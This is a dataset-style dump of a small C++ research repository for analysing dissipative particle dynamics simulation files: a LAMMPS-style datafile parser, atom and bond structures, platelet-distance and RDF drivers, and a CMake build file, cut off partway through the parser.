"blob_id": "0eda28418de4d5b40d397fdcd30aacb567688530",
"content_id": "6af34db73762510c08333749f8b1a1cced767c62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3552,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 104,
"path": "/src/get_fnames.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "// Should be removed (correct but deprecated)\n\n\n#ifndef GET_FNAMES_HPP\n#define GET_FNAMES_HPP\n\n\n#include <string>\n#include <vector>\n\n\nstd::vector<std::string> AVAILABLE_REGIMES = {\n \"article_params\",\n \"npt_attraction\",\n \"poly_mod_likeness\"\n};\n\n\nstd::vector<std::vector<std::string>> get_fnames(std::string regime)\n{\n std::string dpd_dir(\"/media/anton/Seagate Expansion Drive/dpd_calculations/\");\n std::vector<std::vector<std::string>> fnames;\n\n // Some a_ij are small.\n // Both modifier head and taill attract polymer.\n if (regime == \"poly_mod_likeness\")\n {\n std::string dir(\"NOT_SO_GOOD/0_poly_mod_likeness/\");\n std::vector<std::string> subdirs = {\n \"mmt_r10_n2_mod_n100_tail5_poly_p10_n50336/\",\n \"mmt_r10_n2_mod_n200_tail5_poly_p10_n50276/\",\n \"mmt_r10_n2_mod_n300_tail5_poly_p10_n50216/\",\n \"mmt_r10_n2_mod_n400_tail5_poly_p10_n50156/\"\n };\n\n for (size_t in_seria_idx = 0; in_seria_idx < 4; ++in_seria_idx)\n {\n fnames.push_back(std::vector<std::string>());\n for (size_t fname_idx = 0; fname_idx < 162; ++fname_idx)\n {\n std::string fname(dpd_dir + dir + subdirs[in_seria_idx]);\n fname += \"datafiles/dpd_d.\";\n fname += std::to_string(fname_idx * 1000);\n fname += \".data\";\n fnames[in_seria_idx].push_back(fname);\n }\n }\n }\n\n // Some a_ij are ok and taken in accordance with Trieste.\n else if (regime == \"article_params\")\n {\n std::string dir(\"SOME_OTHER_THINGS/ARTICLE_PARAMS/\");\n std::vector<std::string> subdirs = {\n \"13_mmt_r10_n2_mod_n100_tail5_poly_p10_n50336/\",\n \"14_mmt_r10_n2_mod_n200_tail5_poly_p10_n50276/\",\n \"15_mmt_r10_n2_mod_n300_tail5_poly_p10_n50216/\",\n \"16_mmt_r10_n2_mod_n400_tail5_poly_p10_n50156/\"\n };\n\n for (size_t in_seria_idx = 0; in_seria_idx < 4; ++in_seria_idx)\n {\n fnames.push_back(std::vector<std::string>());\n for (size_t fname_idx = 0; fname_idx < 82; ++fname_idx)\n {\n std::string fname(dpd_dir + dir + subdirs[in_seria_idx]);\n fname += \"datafiles/dpd_d.\";\n fname += std::to_string(fname_idx * 1000);\n fname += \".data\";\n fnames[in_seria_idx].push_back(fname);\n }\n }\n }\n\n // NPT + weak repulsion (==attraction) between polymer and modifier's tail\n else if (regime == \"npt_attraction\")\n {\n std::string dir(\"SOME_OTHER_THINGS/npt_attraction/\");\n std::vector<std::string> subdirs = {\n \"9_mmt_r10_n2_mod_n100_tail5_poly_p10_n50336/\",\n \"10_mmt_r10_n2_mod_n200_tail5_poly_p10_n50276/\",\n \"11_mmt_r10_n2_mod_n300_tail5_poly_p10_n50216/\",\n \"12_mmt_r10_n2_mod_n400_tail5_poly_p10_n50156/\"\n };\n\n for (size_t in_seria_idx = 0; in_seria_idx < 4; ++in_seria_idx)\n {\n fnames.push_back(std::vector<std::string>());\n for (size_t fname_idx = 0; fname_idx < 82; ++fname_idx)\n {\n std::string fname(dpd_dir + dir + subdirs[in_seria_idx]);\n fname += \"datafiles/dpd_d.\";\n fname += std::to_string(fname_idx * 1000);\n fname += \".data\";\n fnames[in_seria_idx].push_back(fname);\n }\n }\n }\n\n return fnames;\n}\n\n\n#endif // GET_FNAMES_HPP include guard\n"
},
{
"alpha_fraction": 0.5107182860374451,
"alphanum_fraction": 0.5182399153709412,
"avg_line_length": 26.132652282714844,
"blob_id": "e30c2cc35db88f7dd730260a9a31b99673b7a5ed",
"content_id": "74af82effa536df2bf63c844c64f48103fdf94db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2659,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 98,
"path": "/src/char_py_string.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef CHAR_PY_STRING_HPP\n#define CHAR_PY_STRING_HPP\n\n\n// For the better performance, CharPyString stores lines\n// as char[LINESIZE], i.e. LINESIZE is a maximal length of the line\n#define LINESIZE 250\n\n\n#include <cstring>\n\n\n// Container for the string, which also has\n// .startswith() and .endswith() from Python's str\n// and couple of another useful methods.\nclass CharPyString\n{\npublic:\n CharPyString(const char *cs)\n : _len(strlen(cs))\n {\n memcpy(this->_content, cs, strlen(cs) + 1);\n };\n\n const size_t len() const\n {\n return this->_len;\n }\n\n const bool startswith(const char *str) const\n {\n size_t len = strlen(str);\n if (len > this->_len)\n return false;\n for (size_t idx = 0; idx < len; idx++)\n if (str[idx] != this->_content[idx])\n return false;\n return true;\n }\n\n const bool endswith(const char *str) const\n {\n // When reading file in c-style in datafile_content.hpp,\n // this->_content[this->_len - 1] is a terminating character, so\n // this->_content[this->_len - 2] is a last valuable character.\n // When reading via std::getline(ifstream), -1 is correct.\n // delta should take care about this problem\n size_t delta = 1;\n if (this->_content[this->_len - 1] == '\\0')\n {\n delta +=1;\n } \n\n const size_t len = strlen(str);\n if (len > this->_len)\n return false;\n\n for (size_t idx = 0; idx < len; idx++)\n {\n if (str[len - 1 - idx] != this->_content[this->_len - 1 - idx])\n {\n return false;\n }\n }\n return true;\n }\n\n const float word_as_float(const size_t required_word_idx) const\n {\n char result[LINESIZE];\n size_t current_word_idx = 0;\n size_t letter_in_chosen_word_idx = 0;\n size_t chosen_word_length = 0;\n for (size_t letter_idx = 0; letter_idx < this->_len; ++letter_idx)\n {\n if (this->_content[letter_idx] == ' ')\n {\n current_word_idx++;\n continue;\n }\n if (current_word_idx == required_word_idx)\n {\n result[letter_in_chosen_word_idx] = this->_content[letter_idx];\n letter_in_chosen_word_idx++;\n chosen_word_length++;\n }\n }\n result[chosen_word_length] = '\\0';\n return strtod(result, nullptr);\n }\n\nprivate:\n size_t _len;\n char _content[LINESIZE];\n};\n\n\n#endif // CHAR_PY_STRING_HPP include guard\n"
},
{
"alpha_fraction": 0.5743175148963928,
"alphanum_fraction": 0.5824064612388611,
"avg_line_length": 21.477272033691406,
"blob_id": "4ca545ba0c5502ea2ac6eabdb385f50b306a5e36",
"content_id": "7a7f0c173086d5ba40606e7012e3355e578a700f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 989,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 44,
"path": "/main.cpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#include <algorithm>\n#include <iostream>\n#include <string>\n#include <vector>\n\n#include \"src/char_py_string.hpp\"\n#include \"src/datafile_content.hpp\"\n#include \"src/get_fnames.hpp\"\n#include \"src/perform_seria.hpp\"\n#include \"src/platelets_distance.hpp\"\n\n\n#define MMT_ATOM_TYPE 1\n#define PLATELETS_COUNT 2\n\n\nextern std::vector<std::string> AVAILABLE_REGIMES;\n\n\nint main(int argc, char **argv)\n{\n if (argc < 2)\n {\n std::cout << \"Regime is not set in (empty argv[1])\\n\";\n return 0;\n }\n\n std::string regime(argv[1]);\n std::cout << \"---\" << regime << \"---\\n\";\n if (std::find(AVAILABLE_REGIMES.begin(), AVAILABLE_REGIMES.end(), regime)\n == AVAILABLE_REGIMES.end())\n {\n std::cout << \"Unknown regime: \" << regime << \"\\ntry one of:\\n\";\n for (auto &r : AVAILABLE_REGIMES)\n {\n std::cout << r << std::endl;\n }\n return 0;\n }\n\n perform_seria(regime, MMT_ATOM_TYPE, PLATELETS_COUNT);\n \n return 0;\n}\n"
},
{
"alpha_fraction": 0.6421282887458801,
"alphanum_fraction": 0.6421282887458801,
"avg_line_length": 30.66153907775879,
"blob_id": "9f514f851188487c02fcf1f4151d9671b9691c3f",
"content_id": "847d1aaa5493b44c4f34bd0ea34d2afc2f251d7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4116,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 130,
"path": "/src/structures.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef STRUCTURES_HPP\n#define STRUCTURES_HPP\n\n\n// Some immutable containers to store atomic structures data\n\n\nclass Atom\n{\npublic:\n Atom(unsigned int id, unsigned int molecule_tag, unsigned int type,\n float q, float x, float y, float z, int nx, int ny, int nz)\n : _id(id), _molecule_tag(molecule_tag), _type(type), _q(q),\n _x(x), _y(y), _z(z), _nx(nx), _ny(ny), _nz(nz)\n {};\n\n const unsigned int id() const { return this->_id; }\n const unsigned int molecule_tag() const { return this->_molecule_tag; }\n const unsigned int type() const { return this->_type; }\n const float q() const { return this->_q; }\n const float x() const { return this->_x; }\n const float y() const { return this->_y; }\n const float z() const { return this->_z; }\n const int nx() const { return this->_nx; }\n const int ny() const { return this->_ny; }\n const int nz() const { return this->_nz; }\n\nprivate:\n unsigned int _id;\n unsigned int _molecule_tag;\n unsigned int _type;\n float _q;\n float _x, _y, _z;\n int _nx, _ny, _nz;\n};\n\n\nclass Bond\n{\npublic:\n Bond(unsigned int id, unsigned int type, unsigned int atom_one_id,\n unsigned int atom_two_id)\n : _id(id), _type(type), _atom_one_id(atom_one_id), _atom_two_id(atom_two_id)\n {}\n\n const unsigned int id() const { return this->_id; }\n const unsigned int type() const { return this->_type; }\n const unsigned int atom_one_id() const { return this->_atom_one_id; }\n const unsigned int atom_two_id() const { return this->_atom_two_id; }\n\nprivate:\n unsigned int _id;\n unsigned int _type;\n unsigned int _atom_one_id, _atom_two_id;\n};\n\n\nclass Angle\n{\npublic:\n Angle(unsigned int id, unsigned int type,\n unsigned int atom_one_id, unsigned int atom_two_id,\n unsigned int atom_three_id)\n : _id(id), _type(type), _atom_one_id(atom_one_id), _atom_two_id(atom_two_id),\n _atom_three_id(atom_three_id)\n {}\n\n const unsigned int id() const { return this->_id; }\n const unsigned int type() const { return this->_type; }\n const unsigned int atom_one_id() const { return this->_atom_one_id; }\n const unsigned int atom_two_id() const { return this->_atom_two_id; }\n const unsigned int atom_tree_id() const { return this->_atom_three_id; }\n\nprivate:\n unsigned int _id;\n unsigned int _type;\n unsigned int _atom_one_id, _atom_two_id, _atom_three_id;\n};\n\n\n// Since dihedrals and impropers are quite similar\nclass DihedralImproperBase\n{\npublic:\n const unsigned int id() const { return this->_id; }\n const unsigned int type() const { return this->_type; }\n const unsigned int atom_one_id() const { return this->_atom_one_id; }\n const unsigned int atom_two_id() const { return this->_atom_two_id; }\n const unsigned int atom_tree_id() const { return this->_atom_three_id; }\n const unsigned int atom_four_id() const { return this->_atom_three_id; }\n\nprotected:\n DihedralImproperBase(unsigned int id, unsigned int type,\n unsigned int atom_one_id, unsigned int atom_two_id,\n unsigned int atom_three_id, unsigned int atom_four_id)\n : _id(id), _type(type), _atom_one_id(atom_one_id), _atom_two_id(atom_two_id),\n _atom_three_id(atom_three_id), _atom_four_id(atom_four_id)\n {}\n\n unsigned int _id;\n unsigned int _type;\n unsigned int _atom_one_id, _atom_two_id, _atom_three_id, _atom_four_id;\n};\n\n\nclass Dihedral : private DihedralImproperBase\n{\npublic:\n Dihedral(unsigned int id, unsigned int type,\n unsigned int atom_one_id, unsigned int atom_two_id,\n unsigned int atom_three_id, unsigned int atom_four_id)\n : DihedralImproperBase(id, type, atom_one_id, atom_two_id, atom_three_id,\n atom_four_id)\n {};\n};\n\n\nclass Improper : private DihedralImproperBase\n{\npublic:\n Improper(unsigned int id, unsigned int type,\n unsigned int atom_one_id, unsigned int atom_two_id,\n unsigned int atom_three_id, unsigned int atom_four_id)\n : DihedralImproperBase(id, type, atom_one_id, atom_two_id, atom_three_id,\n atom_four_id)\n {};\n};\n\n\n#endif // STRUCTURES_HPP include guard\n"
},
{
"alpha_fraction": 0.752043604850769,
"alphanum_fraction": 0.752043604850769,
"avg_line_length": 18.3157901763916,
"blob_id": "783fd949b2412eefc823291a5d5550deb2dff78c",
"content_id": "89c2319f19f3e94aa4cc293b4b535e52bd05d7e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 367,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 19,
"path": "/src/platelets_distance.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef PLATELETS_DISTANCE_HPP\n#define PLATELETS_DISTANCE_HPP\n\n\n#include <cmath>\n#include <iostream>\n#include <map>\n#include <vector>\n\n#include \"datafile_content.hpp\"\n#include \"structures.hpp\"\n\n\nconst std::pair<float, float>\nplatelets_distance(DatafileContent &dfc, size_t mmt_atom_type,\n size_t platelets_count);\n\n\n#endif // PLATELETS_DISTANCE_HPP include guard\n"
},
{
"alpha_fraction": 0.5164158940315247,
"alphanum_fraction": 0.5184678435325623,
"avg_line_length": 28.239999771118164,
"blob_id": "abeeab5e01d28053fd6204422f4140f7fb61d986",
"content_id": "f4b548c2408c1ed7a253190348a93ce384d5927d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1462,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 50,
"path": "/src/perform_seria.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "// Should be removed (correct but deprecated)\n\n\n#ifndef PERFORM_SERIA_HPP\n#define PERFORM_SERIA_HPP\n\n\n#include <string>\n#include <vector>\n\n#include \"platelets_distance.hpp\"\n\n\n// Process folders for a seria of calculations\nvoid perform_seria(std::string regime, size_t mmt_atom_type, size_t platelets_count)\n{\n std::vector<std::vector<std::string>> fnames(get_fnames(regime));\n\n for (size_t in_seria_idx = 0; in_seria_idx < fnames.size(); ++in_seria_idx)\n {\n std::cout << \"~~~ \" << in_seria_idx << \" ~~~\\n\";\n if (fnames[in_seria_idx].size() == 0)\n {\n std::cout << \"Empty file list!\";\n return;\n }\n\n std::ofstream ofs(\"outs/\" + regime + \"_\" + std::to_string(in_seria_idx));\n for (size_t file_idx = 0; file_idx < fnames[in_seria_idx].size();\n ++file_idx)\n {\n FILE *fp = fopen(fnames[in_seria_idx][file_idx].c_str(), \"r\");\n if (fp == NULL)\n {\n continue;\n }\n DatafileContent dfc(fnames[in_seria_idx][file_idx]);\n auto &d = platelets_distance(dfc, mmt_atom_type, platelets_count);\n std::cout << in_seria_idx << \" \" << file_idx << \" \"\n << d.first << \" \" << d.second << std::endl;\n ofs << file_idx << \" \" << d.first << \" \" << d.second << std::endl;\n }\n ofs.close();\n }\n\n return;\n}\n\n\n#endif // PERFORM_SERIA_HPP include guard\n"
},
{
"alpha_fraction": 0.4857518672943115,
"alphanum_fraction": 0.5021920204162598,
"avg_line_length": 36.3934440612793,
"blob_id": "7871a0a0369a14ba41301582a2348ef5f521939c",
"content_id": "fe1a0af176cf1be14f053511718738168d358c26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4562,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 122,
"path": "/src/platelets_distance.cpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#include \"platelets_distance.hpp\"\n\n\nconst std::pair<float,float>\nplatelets_distance(DatafileContent &dfc, size_t mmt_atom_type,\nsize_t platelets_count)\n{\n const Atom *all_atoms = dfc.atoms();\n\n // Extract only MMT atoms\n size_t mmt_atoms_count(0);\n // ids start from 1, so dfc.atoms()[0] is trash since it was set by key==id\n for (size_t idx = 1; idx < dfc.atoms_count(); idx++)\n {\n if (all_atoms[idx].type() == mmt_atom_type)\n {\n mmt_atoms_count++;\n }\n }\n Atom *mmt_atoms = (Atom *)malloc(sizeof(Atom) * (mmt_atoms_count + 1));\n size_t mmt_atoms_found = 0;\n // ids start from 1, so dfc.atoms()[0] is trash since it was set by key==id\n for (size_t idx = 1; idx < dfc.atoms_count(); idx++)\n {\n if (all_atoms[idx].type() == mmt_atom_type)\n {\n mmt_atoms[mmt_atoms_found + 1] = all_atoms[idx]; // trash in 0\n mmt_atoms_found++;\n }\n }\n\n // Map atoms onto platelets.\n if (mmt_atoms_found % platelets_count)\n {\n std::cerr << \"Error: MMT platelets are not identical!\\n\";\n return std::make_pair<float, float>(-1, -1);\n }\n std::map<unsigned int, std::vector<Atom> > atoms_onto_plats;\n const size_t in_plat = mmt_atoms_found / platelets_count;\n {\n for (size_t plat_idx = 0; plat_idx < platelets_count; ++plat_idx)\n {\n atoms_onto_plats[plat_idx] = std::vector<Atom>();\n }\n for (size_t idx = 1; idx < mmt_atoms_found + 1; ++idx) // trash in 0\n {\n size_t platelet_idx = (idx - 1) / in_plat;\n atoms_onto_plats[platelet_idx].push_back(all_atoms[idx]);\n }\n }\n\n // Get result\n float ave_closest_plat_plat(0);\n float ave_average_plat_plat(0);\n {\n // Global minimum between all distances between\n // atom of platelet i and atom of platelet j\n std::vector<std::vector<float> > closest_plat_plat(platelets_count,\n std::vector<float>(platelets_count,0));\n // Avearage of distances from atom of platelet i and \n // closest atom of platelet j\n std::vector<std::vector<float> > average_plat_plat(platelets_count,\n std::vector<float>(platelets_count,0));\n\n const float lx(dfc.xhi() - dfc.xlo());\n const float ly(dfc.yhi() - dfc.ylo());\n const float lz(dfc.zhi() - dfc.zlo());\n const float big_distance(std::max(std::max(lx, ly), lz));\n for(size_t idx1 = 0; idx1 < platelets_count; ++idx1)\n {\n const size_t n1(atoms_onto_plats[idx1].size());\n for(size_t idx2 = idx1 + 1; idx2 < platelets_count; ++idx2)\n {\n const size_t n2(atoms_onto_plats[idx2].size());\n\n float global_min(big_distance);\n float ave_local_min(0);\n\n for (auto &atom1 : atoms_onto_plats[idx1])\n {\n float local_min(big_distance);\n\n for (auto &atom2 : atoms_onto_plats[idx2])\n {\n float dx(fabs(atom1.x() - atom2.x()\n + (atom1.nx() - atom2.nx()) * lx));\n float dy(fabs(atom1.y() - atom2.y()\n + (atom1.ny() - atom2.ny()) * ly));\n float dz(fabs(atom1.z() - atom2.z()\n + (atom1.nz() - atom2.nz()) * lz));\n float dr(sqrt(dx*dx + dy*dy + dz*dz));\n\n global_min = std::min(global_min, dr);\n local_min = std::min(local_min, dr);\n }\n\n ave_local_min += local_min / n1;\n }\n closest_plat_plat[idx1][idx2] = global_min;\n closest_plat_plat[idx2][idx1] = global_min;\n average_plat_plat[idx1][idx2] = ave_local_min;\n average_plat_plat[idx2][idx1] = ave_local_min;\n }\n }\n for(size_t idx1 = 0; idx1 < platelets_count; ++idx1)\n {\n ave_closest_plat_plat += closest_plat_plat[idx1][0];\n }\n ave_closest_plat_plat /= platelets_count - 1;\n\n for(size_t idx1 = 0; idx1 < platelets_count; ++idx1)\n {\n ave_average_plat_plat += average_plat_plat[idx1][0];\n }\n ave_average_plat_plat /= platelets_count - 1;\n }\n\n free(mmt_atoms);\n\n return std::make_pair<float&, float&>(\n ave_average_plat_plat, ave_closest_plat_plat);\n}\n"
},
{
"alpha_fraction": 0.6090775728225708,
"alphanum_fraction": 0.6486091017723083,
"avg_line_length": 23.39285659790039,
"blob_id": "940a41246c6e6f916312ba73a3f0019f1a82d48c",
"content_id": "73b84cb76b34825df454483f798212fba9ad9ef1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 683,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 28,
"path": "/rdf.cpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#include <algorithm>\n#include <iostream>\n#include <map>\n#include <string>\n#include <vector>\n\n#include \"src/char_py_string.hpp\"\n#include \"src/datafile_content.hpp\"\n#include \"src/get_fnames.hpp\"\n#include \"src/perform_seria.hpp\"\n#include \"src/platelets_distance.hpp\"\n\n#include \"src/get_rdf.hpp\"\n\n\nint main(int argc, char **argv)\n{\n DatafileContent dfc(\"L_d.12500000.data\");\n //std::vector<unsigned int> atom_types({9, 10, 11, 12, 13, 14, 15, 16, 17});\n std::vector<unsigned int> atom_types({9});\n\n std::map<float, float> rdf_result = get_rdf(dfc, atom_types);\n\n for (auto &it : rdf_result)\n std::cout << it.first << \" \" << it.second << std::endl;\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6156299710273743,
"alphanum_fraction": 0.6236044764518738,
"avg_line_length": 19.225807189941406,
"blob_id": "ea27f5db015ccc5e9118b5b336965512601a5666",
"content_id": "39c630574495c05e97e7456a4b2b24918225658e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1254,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 62,
"path": "/CMakeLists.txt",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required (VERSION 2.6) \n \n\nset (PROJECT dpd_tools) \n\n\nproject (${PROJECT}) \n\nset(THREADS_PREFER_PTHREAD_FLAG ON)\nfind_package(Threads REQUIRED)\n\n\n# CMAKE_CXX_FLAGS:\n#\n# -std=c++17\n#\n# -g0 no debug information\n# -g1 minimal debug information\n# -g default debug information\n# -g3 maximal debug information\n#\n# -lm link math library\n#\n# -DMACRO define MACRO:\n# DETAILED_OUTPUT print a lot of log information\n# GENERAL_OUTPUT print only main information\n# PARTIAL_DATAFILES write out some incomplete datafiles (for debug mainly)\n\n\nif (CMAKE_COMPILER_IS_GNUCXX)\n set(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS}\\\n -Werror \\\n -std=c++17 \\\n -g \\\n -lm \\\n -O3 \\\n -DDETAILED_OUTPUT \\\n -DGENERAL_OUTPUT \\\n \")\nendif (CMAKE_COMPILER_IS_GNUCXX)\n\n\nset (HEADERS\n src/char_py_string.hpp\n src/datafile_content.hpp\n src/get_fnames.hpp\n src/perform_seria.hpp\n src/platelets_distance.hpp\n src/structures.hpp\n\n src/get_rdf.hpp\n)\n\nset (SOURCES\n src/platelets_distance.cpp\n src/get_rdf.cpp\n)\n\n\nadd_executable (test_exe ${HEADERS} ${SOURCES} main.cpp)\n\nadd_executable (rdf_exe ${HEADERS} ${SOURCES} rdf.cpp)\n"
},
{
"alpha_fraction": 0.5048797726631165,
"alphanum_fraction": 0.5120767951011658,
"avg_line_length": 40.49547576904297,
"blob_id": "3e85b67a0738d75050884910a641fbb3677c3ef7",
"content_id": "ceee376fa481411b6905fab6f59c960a7bf99a25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 18341,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 442,
"path": "/src/datafile_content.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef DATAFILE_CONTENT_HPP\n#define DATAFILE_CONTENT_HPP\n\n\n#include <cstdlib>\n#include <cstdio>\n\n#include <array>\n#include <fstream>\n#include <iostream>\n#include <map>\n#include <string>\n#include <sstream>\n#include <tuple>\n#include <vector>\n\n#include \"structures.hpp\"\n#include \"char_py_string.hpp\"\n\n\n// Container for datafile reading\nclass DatafileContent\n{\npublic:\n DatafileContent(std::string fname)\n : _fname(fname), _atoms(nullptr), _velocities(nullptr), _bonds(nullptr),\n _angles(nullptr), _dihedrals(nullptr), _impropers(nullptr), _masses(nullptr),\n _pair_coeffs(nullptr), _bond_coeffs(nullptr), _angle_coeffs(nullptr),\n _dihedral_coeffs(nullptr), _improper_coeffs(nullptr)\n {\n this->read_datafile();\n }\n\n ~DatafileContent()\n {\n if (this->_atoms != nullptr)\n free(this->_atoms);\n if (this->_velocities != nullptr)\n free(this->_velocities);\n if (this->_bonds != nullptr)\n free(this->_bonds);\n if (this->_angles != nullptr)\n free(this->_angles);\n if (this->_dihedrals != nullptr)\n free(this->_dihedrals);\n if (this->_impropers != nullptr)\n free(this->_impropers);\n if (this->_masses != nullptr)\n free(this->_masses);\n if (this->_pair_coeffs != nullptr)\n free(this->_pair_coeffs);\n if (this->_bond_coeffs != nullptr)\n free(this->_bond_coeffs);\n if (this->_angle_coeffs != nullptr)\n free(this->_angle_coeffs);\n if (this->_dihedral_coeffs != nullptr)\n free(this->_dihedral_coeffs);\n if (this->_improper_coeffs != nullptr)\n free(this->_improper_coeffs);\n }\n\n const Atom *atoms() const { return this->_atoms; }\n const Bond *bonds() const { return this->_bonds; }\n const Angle *angles() const { return this->_angles; }\n const Dihedral *dihedrals() const { return this->_dihedrals; }\n const Improper *impropers() const { return this->_impropers; }\n\n const std::string fname() const { return this->_fname; }\n const std::string comment() const { return this->_comment; }\n const unsigned int atoms_count() const { return this->_atoms_count; }\n const unsigned int atom_types() const { return this->_atom_types; }\n const std::tuple<float, float, float>* velocities() const\n { return this->_velocities; }\n const unsigned int bonds_count() const { return this->_bonds_count; }\n const unsigned int bond_types() const { return this->_bond_types; }\n const unsigned int angles_count() const { return this->_angles_count; }\n const unsigned int angle_types() const { return this->_angle_types; }\n const unsigned int dihedrals_count() const { return this->_dihedrals_count; }\n const unsigned int dihedral_types() const { return this->_dihedral_types; }\n const unsigned int impropers_count() const { return this->_impropers_count; }\n const unsigned int improper_types() const { return this->_improper_types; }\n const float xlo() const { return this->_xlo; }\n const float xhi() const { return this->_xhi; }\n const float ylo() const { return this->_ylo; }\n const float yhi() const { return this->_yhi; }\n const float zlo() const { return this->_zlo; }\n const float zhi() const { return this->_zhi; }\n const float xy() const { return this->_xy; }\n const float xz() const { return this->_xz; }\n const float yz() const { return this->_yz; }\n const float *masses() const { return this->_masses; }\n const std::tuple<float, float>* pair_coeffs() const\n { return this->_pair_coeffs; }\n const std::tuple<float, float>* bond_coeffs() const\n { return this->_bond_coeffs; }\n const std::tuple<float, float>* angle_coeffs() const\n { return this->_angle_coeffs; }\n const std::tuple<float, int, int>* dihedral_coeffs() const\n { return this->_dihedral_coeffs; }\n const std::tuple<float, int, int>* improper_coeffs() const\n { return this->_improper_coeffs; }\n\n void read_datafile()\n {\n std::vector<CharPyString> lines;\n std::string buffer_line;\n unsigned int masses_idx = 0;\n unsigned int pair_coeffs_idx = 0;\n unsigned int bond_coeffs_idx = 0;\n unsigned int angle_coeffs_idx = 0;\n unsigned int dihedral_coeffs_idx = 0;\n unsigned int improper_coeffs_idx = 0;\n unsigned int atoms_idx = 0;\n unsigned int velocities_idx = 0;\n unsigned int bonds_idx = 0;\n unsigned int angles_idx = 0;\n unsigned int dihedrals_idx = 0;\n unsigned int impropers_idx = 0;\n\n // Reading lines in c-style is not faster as i think;\n // also, C getline produces lines with '\\n'\n std::ifstream ifs(this->_fname);\n while (std::getline(ifs, buffer_line))\n {\n lines.push_back(buffer_line.c_str());\n }\n\n for (size_t idx = 0; idx < lines.size(); ++idx)\n {\n if (lines[idx].endswith(\"atoms\"))\n this->_atoms_count = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"bonds\"))\n this->_bonds_count = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"angles\"))\n this->_angles_count = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"dihedrals\"))\n this->_dihedrals_count = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"impropers\"))\n this->_impropers_count = lines[idx].word_as_float(0);\n\n else if (lines[idx].endswith(\"atom types\"))\n this->_atom_types = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"bond types\"))\n this->_bond_types = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"angle types\"))\n this->_angle_types = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"dihedral types\"))\n this->_dihedral_types = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"improper types\"))\n this->_improper_types = lines[idx].word_as_float(0);\n\n else if (lines[idx].endswith(\"xlo xhi\"))\n {\n this->_xlo = lines[idx].word_as_float(0);\n this->_xhi = lines[idx].word_as_float(1);\n }\n else if (lines[idx].endswith(\"ylo yhi\"))\n {\n this->_ylo = lines[idx].word_as_float(0);\n this->_yhi = lines[idx].word_as_float(1);\n }\n else if (lines[idx].endswith(\"zlo zhi\"))\n {\n this->_zlo = lines[idx].word_as_float(0);\n this->_zhi = lines[idx].word_as_float(1);\n }\n else if (lines[idx].endswith(\"xy xz yz\"))\n {\n this->_xy = lines[idx].word_as_float(0);\n this->_xz = lines[idx].word_as_float(1);\n this->_yz = lines[idx].word_as_float(2);\n }\n\n else if (lines[idx].endswith(\"Masses\"))\n masses_idx = idx;\n else if (lines[idx].startswith(\"Pair Coeffs\"))\n pair_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Bond Coeffs\"))\n bond_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Angle Coeffs\"))\n angle_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Dihedral Coeffs\"))\n dihedral_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Improper Coeffs\"))\n improper_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Atoms\"))\n atoms_idx = idx;\n else if (lines[idx].startswith(\"Velocities\"))\n velocities_idx = idx;\n else if (lines[idx].startswith(\"Bonds\"))\n bonds_idx = idx;\n else if (lines[idx].startswith(\"Angles\"))\n angles_idx = idx;\n else if (lines[idx].startswith(\"Dihedrals\"))\n dihedrals_idx = idx;\n else if (lines[idx].startswith(\"Impropers\"))\n impropers_idx = idx;\n }\n\n if (masses_idx)\n {\n this->_masses = (float *)malloc(\n sizeof(float) * (this->_atom_types + 1));\n\n auto first = lines.begin() + masses_idx + 2;\n auto last = lines.begin() + masses_idx + 2 + this->_atom_types;\n for 